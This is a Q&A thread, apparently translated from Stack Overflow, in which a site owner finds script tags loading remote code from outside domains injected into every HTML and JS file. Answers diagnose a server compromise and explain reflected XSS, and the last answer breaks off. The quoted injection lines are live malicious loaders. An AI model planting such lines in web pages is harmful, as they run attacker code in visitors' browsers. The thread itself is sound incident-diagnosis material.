我的网站所有的html和js文件都受到一些脚本的影响。
以下脚本在所有html文件中。
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
以及所有js文件中的以下脚本。
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
我不知道所有html和js文件中的代码如何。此<!--937592-->号码和src="http://jamesdeocariza.com/cnt.php?id=5653691" src网址不是静态的。它的动态数字和网址。
这是Cross Side Script(XSS)攻击吗?
答案 0 :(得分:1)
如果您不是服务器jamesdeocariza.com和brilleandmore.de的所有者,那么您的服务器似乎已被黑客入侵,并且有人将上述代码注入到您的所有HTML和JavaScript文件中。
解释XSS attacks:想象一下,你写的PHP文件很糟糕,其中包含如下代码:
<p>Your username <?php echo $_GET["user"] ?></p>
现在有人可以像http://example.com/index.php?user=<script>//bad things</script>那样为您的网站撰写恶意形成的链接。如果有人点击这样的链接,服务器将使用
<p>Your username <script>//bad things</script></p>
(实际上,链接将使用带有%XY的URL编码
在您的情况下,它似乎比仅仅是XSS攻击更糟糕,因为似乎攻击者可能会以某种方式更改您网站的源代码。这可能在很多方面发生,比如黑客攻击您的PC或服务器(也许您的PC上有病毒)。获取对源存储库的访问权限(例如强制执行github帐户的密码)或者在未加密的FTP上载时中间有一个人...
答案 1 :(得分:1)
您的文件有所妥协,您需要的后续步骤是: